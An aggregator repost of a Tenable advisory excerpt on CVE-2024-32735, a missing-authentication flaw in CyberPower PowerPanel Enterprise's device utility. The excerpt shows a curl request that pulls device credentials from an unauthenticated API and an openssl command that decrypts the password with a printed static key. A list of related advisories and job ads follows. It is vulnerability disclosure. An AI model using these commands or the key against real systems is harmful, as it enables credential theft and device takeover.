CyberPower PowerPanel Enterprise Power Device Network Utility Multiple Vulnerabilities | allinfosecnews.com

May 9, 2024, 2:39 p.m. | Jimi Sebree

Tenable Research Advisories www.tenable.com

CyberPower PowerPanel Enterprise Power Device Network Utility Multiple Vulnerabilities

CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:

curl '>:8085/api/v1/devices'
{"status":"success","results":[{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"255.255.255.0","gateway":" \"192.168.1.1\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}

The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):

echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r  | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e …

access account action admin api apis attacker authentication can code credentials critical curl cve cve-2024 cvss cyberpower cyberpower powerpanel device devices encrypted enterprise fetch function gateway information location login login credentials mac managed missing name netmask network password power rest rest apis results sensitive sensitive information unauthenticated uptime utility vulnerabilities

More from www.tenable.com / Tenable Research Advisories

SSRF Security Feature Bypass in Azure AI and ML Studios 1 day, 7 hours ago | www.tenable.com

azure azure ai bypass evan +5

Multiple Vulnerabilities in Adobe FrameMaker Publishing Server (FMPS) December 2022 release Update 2 1 week, 5 days ago | www.tenable.com

adobe adobe framemaker api api authentication +13

Google Cloud Platform (GCP) Privilege Escalation Vulnerability In Cloud Functions 2 weeks ago | www.tenable.com

cloud cloud functions cloud platform escalation +9

Google Cloud Platform (GCP) Privilege Escalation Vulnerability In Cloud Functions 2 weeks ago | www.tenable.com

cloud cloud functions cloud platform escalation +9

Microsoft Azure Firewall Bypass Vulnerability 2 weeks, 1 day ago | www.tenable.com

azure bypass bypass vulnerability firewall +4

Google Cloud Platform Remote Code Execution Vulnerability in GCP Composer 2 weeks, 2 days ago | www.tenable.com

arbitrary code attackers cloud cloud platform +19

Fluent Bit Memory Corruption Vulnerability 1 month ago | www.tenable.com

corruption memory memory corruption vulnerability

Cross-Site Scripting in WordPress RSS Aggregator Plugin 1 month ago | www.tenable.com

cross-site plugin rss scripting +1

Solidus Stored Cross-Site Scripting 1 month ago | www.tenable.com

cross-site inject javascript malicious +8

Information Technology Specialist I, LACERA: Information Security Engineer

@ Los Angeles County Employees Retirement Association (LACERA) | Pasadena, CA

View on infosec-jobs.com

Junior Analyst, Structured Data Services

@ Arete | Hyderabad

View on infosec-jobs.com

Manager, Global Data Analysis & Notification

@ Epiq | IND-Hyderabad-Sohini Tech Park, 3rd Floor, Financial District

View on infosec-jobs.com

Network Automation and Orchestration Engineer

@ ManTech | REMT - Remote Worker Location

View on infosec-jobs.com

Security Automation Developer

@ Maveris | Hines, Illinois, United States

View on infosec-jobs.com

Security Automation Developer

@ Maveris | Martinsburg, West Virginia, United States

View on infosec-jobs.com